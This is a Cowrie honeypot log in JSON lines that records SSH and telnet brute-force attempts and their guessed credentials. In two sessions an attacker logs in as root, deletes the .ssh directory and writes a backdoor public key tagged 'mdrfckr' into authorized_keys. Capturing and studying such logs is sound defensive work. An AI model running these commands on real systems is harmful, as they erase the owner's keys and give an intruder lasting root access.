{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.058511Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.login.success","username":"root","password":"ali123","message":"login attempt [root/ali123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.241575Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:34:10.333600Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.334315Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.335102Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.372133Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:34:10.508688Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.509374Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.547417Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.548299Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":37280,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fa63bdcdada","protocol":"ssh","message":"New connection: 82.67.125.95:37280 (1.2.3.4:22) [session: 5fa63bdcdada]","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.581896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.582951Z","src_ip":"82.67.125.95","session":"5fa63bdcdada"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.618495Z","src_ip":"82.67.125.95","session":"5fa63bdcdada"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.801111Z","src_ip":"82.67.125.95","session":"5fa63bdcdada"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:34:11.840053Z","src_ip":"82.67.125.95","session":"5fa63bdcdada"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":37292,"dst_ip":"1.2.3.4","dst_port":22,"session":"195ce9302d5b","protocol":"ssh","message":"New connection: 82.67.125.95:37292 (1.2.3.4:22) [session: 195ce9302d5b]","sensor":"my-vps","timestamp":"2025-08-31T01:34:11.874479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:34:11.875130Z","src_ip":"82.67.125.95","session":"195ce9302d5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:34:11.911128Z","src_ip":"82.67.125.95","session":"195ce9302d5b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:34:12.097062Z","src_ip":"82.67.125.95","session":"195ce9302d5b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:34:12.133873Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:34:12.134972Z","src_ip":"82.67.125.95","session":"195ce9302d5b"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1447,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2ffc0b5a3e2","protocol":"ssh","message":"New connection: 102.88.137.80:1447 (1.2.3.4:22) [session: f2ffc0b5a3e2]","sensor":"my-vps","timestamp":"2025-08-31T01:34:16.407929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:34:16.408894Z","src_ip":"102.88.137.80","session":"f2ffc0b5a3e2"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:34:16.538171Z","src_ip":"102.88.137.80","session":"f2ffc0b5a3e2"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"a12345678","message":"login attempt [ubuntu/a12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:34:17.095801Z","src_ip":"102.88.137.80","session":"f2ffc0b5a3e2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:34:18.227304Z","src_ip":"102.88.137.80","session":"f2ffc0b5a3e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34960,"dst_ip":"1.2.3.4","dst_port":23,"session":"9852d3bce53d","protocol":"telnet","message":"New connection: 212.227.235.229:34960 (1.2.3.4:23) [session: 9852d3bce53d]","sensor":"my-vps","timestamp":"2025-08-31T01:34:31.328674Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42670,"dst_ip":"1.2.3.4","dst_port":22,"session":"829e56a68abd","protocol":"ssh","message":"New connection: 212.227.235.229:42670 (1.2.3.4:22) [session: 829e56a68abd]","sensor":"my-vps","timestamp":"2025-08-31T01:34:41.000119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:34:42.238588Z","src_ip":"212.227.235.229","session":"829e56a68abd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:34:42.239400Z","src_ip":"212.227.235.229","session":"829e56a68abd"}
{"eventid":"cowrie.login.failed","username":"developer","password":"welcome","message":"login attempt [developer/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T01:34:47.895551Z","src_ip":"212.227.235.229","session":"829e56a68abd"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:34:49.694998Z","src_ip":"212.227.235.229","session":"829e56a68abd"}
{"eventid":"cowrie.session.closed","duration":30.397597789764404,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:01.726176Z","src_ip":"212.227.235.229","session":"9852d3bce53d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33126,"dst_ip":"1.2.3.4","dst_port":22,"session":"77523d0d9b2b","protocol":"ssh","message":"New connection: 212.227.125.160:33126 (1.2.3.4:22) [session: 77523d0d9b2b]","sensor":"my-vps","timestamp":"2025-08-31T01:35:03.798308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:35:04.000867Z","src_ip":"212.227.125.160","session":"77523d0d9b2b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55742,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff10408fbf2f","protocol":"ssh","message":"New connection: 217.72.205.35:55742 (1.2.3.4:22) [session: ff10408fbf2f]","sensor":"my-vps","timestamp":"2025-08-31T01:35:05.161130Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:05.162171Z","src_ip":"217.72.205.35","session":"ff10408fbf2f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:35:05.597808Z","src_ip":"212.227.125.160","session":"77523d0d9b2b"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":58246,"dst_ip":"1.2.3.4","dst_port":22,"session":"67347db6786c","protocol":"ssh","message":"New connection: 82.67.125.95:58246 (1.2.3.4:22) [session: 67347db6786c]","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.180881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.181903Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.218146Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.login.success","username":"root","password":"7ujm8ik,","message":"login attempt [root/7ujm8ik,] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.402583Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:35:06.495695Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.496476Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.497800Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.535087Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47646,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dfc5e5c9216","protocol":"ssh","message":"New connection: 212.227.125.160:47646 (1.2.3.4:22) [session: 1dfc5e5c9216]","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.615808Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:35:06.665185Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.666002Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.703858Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.705098Z","src_ip":"82.67.125.95","session":"67347db6786c"}
